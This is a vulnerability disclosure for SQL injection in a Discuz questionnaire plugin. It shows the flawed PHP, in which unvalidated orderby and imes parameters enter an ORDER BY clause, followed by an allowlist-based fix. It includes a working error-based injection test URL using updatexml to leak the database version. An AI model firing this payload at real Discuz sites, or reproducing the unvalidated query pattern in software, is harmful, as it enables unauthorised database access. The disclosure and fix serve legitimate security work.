Discuz Questionnaire Survey Professional Edition plugin injection

Category: 漏洞时代 (Vulnerability Era)
Summary

nds_ques_viewanswer.inc.php (affected code and test method):

<?PHP
if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}

// The author filter is passed through dhtmlspecialchars() and truncated to 20 characters
!empty($_G['gp_srchtxt']) ? $wherestr .= " AND author = '".dhtmlspecialchars(trim(substr($_GET['srchtxt'],0,20)))."' " : '';

$orderby = $_G['gp_orderby'] ? $_G['gp_orderby'] : 'dateline'; // read the parameter (no validation)
$imes = $_G['gp_imes'] ? $_G['gp_imes'] : 'DESC';              // read the sort direction (no validation)

$questopics = DB::fetch_first("SELECT * FROM ".DB::table('ques_topic')." WHERE `topicid`='$topicid'");
$sysmode = $questopics['ques_mode'];

....

$magiccount = DB::result(DB::query("SELECT COUNT(*) FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' LIMIT 1"), 0);
$multipage = multi($magiccount, $perpage, $page, "plugin.php?id=nds_up_ques:nds_up_ques&action=viewanswer&topicid=".$topicid."&orderby=".$orderby."&imes=".$imes);
$topiclist = '';
$nid = $start_limit+1;

// $orderby and $imes are interpolated straight into the ORDER BY clause
$query = DB::query("SELECT * FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' ".$wherestr." ORDER by $orderby $imes LIMIT $start_limit,$perpage"); // parameter carried into the query

....
?>

Test method:

/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--
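As an added example that is not part of the original post or of the plugin's own code, here is the hardened form of the ORDER BY handling shown above. An ORDER BY column or direction cannot be bound as a prepared-statement parameter, so the fix is to accept only values from a fixed allowlist and otherwise fall back to the defaults the original code already uses ('dateline' and 'DESC'). The column allowlist, the table name and the sample values are assumptions for illustration; only 'dateline' appears in the original snippet.

```php
<?php
// Added example (not the plugin's own code): allowlist validation for the two
// ORDER BY inputs that nds_ques_viewanswer.inc.php interpolates unvalidated.

// Assumed allowlist of sortable columns; only 'dateline' is known from the page.
function safe_order_column($orderby) {
    $allowed = array('dateline', 'uid');
    // Strict comparison: a null or non-string value never matches.
    return in_array($orderby, $allowed, true) ? $orderby : 'dateline';
}

// Sort direction is reduced to one of two literals, never request text.
function safe_order_direction($imes) {
    $imes = strtoupper((string)$imes);
    return ($imes === 'ASC' || $imes === 'DESC') ? $imes : 'DESC';
}

// Mirrors the original's two ternary assignments, reading from the $_G
// request array but returning only validated values.
function read_order_params(array $g) {
    $orderby = isset($g['gp_orderby']) ? $g['gp_orderby'] : '';
    $imes    = isset($g['gp_imes'])    ? $g['gp_imes']    : '';
    return array(safe_order_column($orderby), safe_order_direction($imes));
}

// Builds the answer-list query. $table stands in for DB::table('ques_user');
// $wherestr is the already-escaped author filter from the original code.
function build_answer_query($table, $topicid, $wherestr, $orderby, $imes, $start_limit, $perpage) {
    // Numeric inputs are cast to int so they cannot carry SQL.
    $topicid     = (int)$topicid;
    $start_limit = (int)$start_limit;
    $perpage     = (int)$perpage;
    $col = safe_order_column($orderby);
    $dir = safe_order_direction($imes);
    // The column is backtick-quoted and the direction is a fixed literal.
    return "SELECT * FROM `$table` WHERE `topicid`='$topicid' $wherestr ORDER BY `$col` $dir LIMIT $start_limit,$perpage";
}

// Constructed demo: the orderby value is the payload from the test URL above,
// and the direction is deliberately malformed. Both are discarded for defaults.
$fake_G = array(
    'gp_orderby' => "dateline and 1=(updatexml(1,concat(0x27,version()),1))--",
    'gp_imes'    => "DESC; SELECT 1",
);
list($orderby, $imes) = read_order_params($fake_G);
echo build_answer_query('ques_user', 7, '', $orderby, $imes, 0, 20), "\n";
```

Run it with the PHP command-line interpreter; the query it prints sorts by `dateline` `DESC` regardless of what was supplied. In the plugin, `read_order_params($_G)` would replace the two unvalidated ternary assignments, and the `$topicid`, `$start_limit` and `$perpage` casts close the same class of problem for the numeric inputs.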

